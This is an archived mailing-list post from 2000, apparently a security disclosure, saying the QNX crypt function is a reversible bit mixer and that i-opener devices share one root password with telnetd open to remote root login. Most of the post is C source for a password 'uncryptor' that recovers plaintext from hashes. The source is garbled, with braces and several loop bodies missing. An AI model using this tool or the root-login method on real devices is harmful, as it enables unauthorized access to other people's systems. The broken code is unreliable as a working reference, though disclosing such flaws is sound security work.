Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Subject: qnx crypt comprimised
From: Sean (skasunAZSTARNET.COM)
Date: Fri Apr 14 2000 - 22:03:09 CDT

the crypt function for qnx turned out to a bit mixer, not a
hash function. It's now possible to extract plaintext from
the hashes.

On a related note, all IOpeners (running qnx) use the same
root password. Telnetd is running, and allows remote login
as root. This is a huge security hole, as you can search
uunet for Iopeners, and telnet in as root.

Source for the uncryptor is below:

static ascii2bin(short x)
  if (x>='0' && x<'A')
    return x-'0';
  if (x>='A' && x<'a')
    return (x-'A')+9;
  return (x-'a')+26+9;
char bits[77];

char *quncrypt(char *pw)
  static char newpw[14];
  int i;
  int j,rot;
  int bit,ofs;
  char salt[2];
  int temp;

  for (i=0;i<72;i++)
  for (i=0;i<12;i++)
  rot=(salt[1]*4-salt[0])%128; /* here's all the salt
does. A rotation */
  for (i=0;i<12;i++)
    for (j=0;j<6;j++)
      bit=newpw[i]&(1<<j); /* move password into bit array
  while (rot--) /* do the big rotate */
    for (i=0;i<=65;i++)

  for (i=0;i<8;i++)
    for (j=0;j<7;j++)
      newpw[i]|=(bit<<j); /* and compile the bit array back
  return newpw;